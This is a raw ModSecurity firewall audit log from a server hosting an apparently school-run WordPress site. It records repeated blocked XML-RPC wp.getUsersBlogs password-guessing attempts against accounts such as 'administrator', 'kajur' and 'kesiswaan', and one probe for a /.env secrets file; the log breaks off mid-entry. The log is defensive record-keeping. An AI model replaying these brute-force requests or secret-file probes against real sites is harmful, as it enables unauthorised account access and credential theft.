103.236.140.4 33976 103.236.140.4 8181 --c5eb2c2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c5eb2c2b-C-- wp.getUsersBlogs administrator cowboys --c5eb2c2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5eb2c2b-E-- --c5eb2c2b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (113+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515048541115 5326 (- - -) Stopwatch2: 1745515048541115 5326; combined=3779, p1=470, p2=3139, p3=0, p4=0, p5=100, sr=86, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5eb2c2b-Z-- --ce80d17e-A-- [25/Apr/2025:00:18:28 +0700] aApyZN5yz20UX9VrdZPTVgAAAE0 103.236.140.4 35574 103.236.140.4 8181 --ce80d17e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ce80d17e-C-- wp.getUsersBlogs administrator shaggy --ce80d17e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce80d17e-E-- --ce80d17e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (123+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515108223622 5316 (- - -) Stopwatch2: 1745515108223622 5316; combined=3801, p1=447, p2=3174, p3=0, p4=0, p5=106, sr=86, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce80d17e-Z-- --035b7770-A-- [25/Apr/2025:00:19:28 +0700] aApyoN5yz20UX9VrdZPTmgAAAEw 103.236.140.4 37224 103.236.140.4 8181 --035b7770-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --035b7770-C-- wp.getUsersBlogs kajur admin@#7890 --035b7770-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --035b7770-E-- --035b7770-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (130+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515168359528 17283 (- - -) Stopwatch2: 1745515168359528 17283; combined=27609, p1=418, p2=2943, p3=0, p4=0, p5=12139, sr=88, sw=85, l=0, gc=12024 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --035b7770-Z-- --af057303-A-- [25/Apr/2025:00:20:28 +0700] aApy3MlQo524fhbIj1yWcwAAABc 103.236.140.4 39146 103.236.140.4 8181 --af057303-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --af057303-C-- wp.getUsersBlogs kajur PASSWORD --af057303-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af057303-E-- --af057303-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (129+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515228295860 4426 (- - -) Stopwatch2: 1745515228295860 4426; combined=3245, p1=421, p2=2682, p3=0, p4=0, p5=84, sr=83, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af057303-Z-- --a6aceb0d-A-- [25/Apr/2025:00:21:28 +0700] aApzGPiVYlyO1xhz7yO_vQAAAME 103.236.140.4 41002 103.236.140.4 8181 --a6aceb0d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a6aceb0d-C-- wp.getUsersBlogs kajur 789789 --a6aceb0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6aceb0d-E-- --a6aceb0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (127+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515288052450 6057 (- - -) Stopwatch2: 1745515288052450 6057; combined=4295, p1=485, p2=3625, p3=0, p4=0, p5=108, sr=91, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6aceb0d-Z-- --dfff8862-A-- [25/Apr/2025:00:21:30 +0700] aApzGviVYlyO1xhz7yO_xQAAAMY 103.236.140.4 41088 103.236.140.4 8181 --dfff8862-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 206.81.12.187 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 206.81.12.187 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --dfff8862-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfff8862-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745515290507408 827 (- - -) Stopwatch2: 1745515290507408 827; combined=309, p1=272, p2=0, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfff8862-Z-- --9f875364-A-- [25/Apr/2025:00:22:28 +0700] aApzVGLuk3f9kLjsdTaTTgAAAIU 103.236.140.4 42674 103.236.140.4 8181 --9f875364-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9f875364-C-- wp.getUsersBlogs kajur caonima123 --9f875364-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f875364-E-- --9f875364-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (116+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515348232258 4768 (- - -) Stopwatch2: 1745515348232258 4768; combined=3257, p1=410, p2=2704, p3=0, p4=0, p5=84, sr=89, sw=59, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f875364-Z-- --f0c5b87e-A-- [25/Apr/2025:00:23:15 +0700] aApzg_iVYlyO1xhz7yPA1QAAAMI 103.236.140.4 43776 103.236.140.4 8181 --f0c5b87e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f0c5b87e-C-- wp.getUsersBlogs kajur 1234%^&* --f0c5b87e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0c5b87e-E-- --f0c5b87e-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515395464117 5063 (- - -) Stopwatch2: 1745515395464117 5063; combined=3566, p1=469, p2=2927, p3=0, p4=0, p5=101, sr=85, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0c5b87e-Z-- --cec1637f-A-- [25/Apr/2025:00:23:28 +0700] aApzkPiVYlyO1xhz7yPBDQAAAMI 103.236.140.4 44104 103.236.140.4 8181 --cec1637f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cec1637f-C-- wp.getUsersBlogs kajur qwe1234 --cec1637f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cec1637f-E-- --cec1637f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (118+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515408471033 5215 (- - -) Stopwatch2: 1745515408471033 5215; combined=3722, p1=460, p2=3095, p3=0, p4=0, p5=98, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cec1637f-Z-- --53a97b71-A-- [25/Apr/2025:00:24:28 +0700] aApzzN5yz20UX9VrdZPWDQAAAEA 103.236.140.4 45750 103.236.140.4 8181 --53a97b71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --53a97b71-C-- wp.getUsersBlogs kajur asdfgh --53a97b71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53a97b71-E-- --53a97b71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (113+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515468259495 5306 (- - -) Stopwatch2: 1745515468259495 5306; combined=3810, p1=446, p2=3169, p3=0, p4=0, p5=114, sr=90, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53a97b71-Z-- --8717b133-A-- [25/Apr/2025:00:25:28 +0700] aAp0CPiVYlyO1xhz7yPB6wAAAMY 103.236.140.4 47070 103.236.140.4 8181 --8717b133-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8717b133-C-- wp.getUsersBlogs kajur ladybug --8717b133-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8717b133-E-- --8717b133-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (151+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515528199006 4863 (- - -) Stopwatch2: 1745515528199006 4863; combined=3565, p1=476, p2=2915, p3=0, p4=0, p5=101, sr=156, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8717b133-Z-- --7c4e9370-A-- [25/Apr/2025:00:26:28 +0700] aAp0RN5yz20UX9VrdZPWsQAAAEs 103.236.140.4 48238 103.236.140.4 8181 --7c4e9370-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7c4e9370-C-- wp.getUsersBlogs kesiswaan kesiswaan2018 --7c4e9370-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c4e9370-E-- --7c4e9370-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (147+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515588151143 5147 (- - -) Stopwatch2: 1745515588151143 5147; combined=3645, p1=489, p2=2998, p3=0, p4=0, p5=93, sr=90, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c4e9370-Z-- --088f767e-A-- [25/Apr/2025:00:27:28 +0700] aAp0gGLuk3f9kLjsdTaU_QAAAIE 103.236.140.4 50070 103.236.140.4 8181 --088f767e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --088f767e-C-- wp.getUsersBlogs kesiswaan kesiswaan@1991 --088f767e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --088f767e-E-- --088f767e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (144+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515648332289 5247 (- - -) Stopwatch2: 1745515648332289 5247; combined=3596, p1=430, p2=2962, p3=0, p4=0, p5=116, sr=86, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --088f767e-Z-- --85b4372e-A-- [25/Apr/2025:00:28:28 +0700] aAp0vN5yz20UX9VrdZPXygAAAFY 103.236.140.4 53380 103.236.140.4 8181 --85b4372e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --85b4372e-C-- wp.getUsersBlogs kesiswaan Admin!@# --85b4372e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85b4372e-E-- --85b4372e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (137+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515708367973 4332 (- - -) Stopwatch2: 1745515708367973 4332; combined=2955, p1=378, p2=2425, p3=0, p4=0, p5=90, sr=85, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85b4372e-Z-- --d43daf4f-A-- [25/Apr/2025:00:29:28 +0700] aAp0-PiVYlyO1xhz7yPFDgAAAMQ 103.236.140.4 56820 103.236.140.4 8181 --d43daf4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d43daf4f-C-- wp.getUsersBlogs kesiswaan account --d43daf4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d43daf4f-E-- --d43daf4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (146+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515768230581 5075 (- - -) Stopwatch2: 1745515768230581 5075; combined=3417, p1=403, p2=2842, p3=0, p4=0, p5=99, sr=76, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d43daf4f-Z-- --e5c01021-A-- [25/Apr/2025:00:30:25 +0700] aAp1MWLuk3f9kLjsdTaXsQAAAJM 103.236.140.4 32976 103.236.140.4 8181 --e5c01021-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e5c01021-C-- wp.getUsersBlogs kesiswaan 1234%^&* --e5c01021-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5c01021-E-- --e5c01021-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
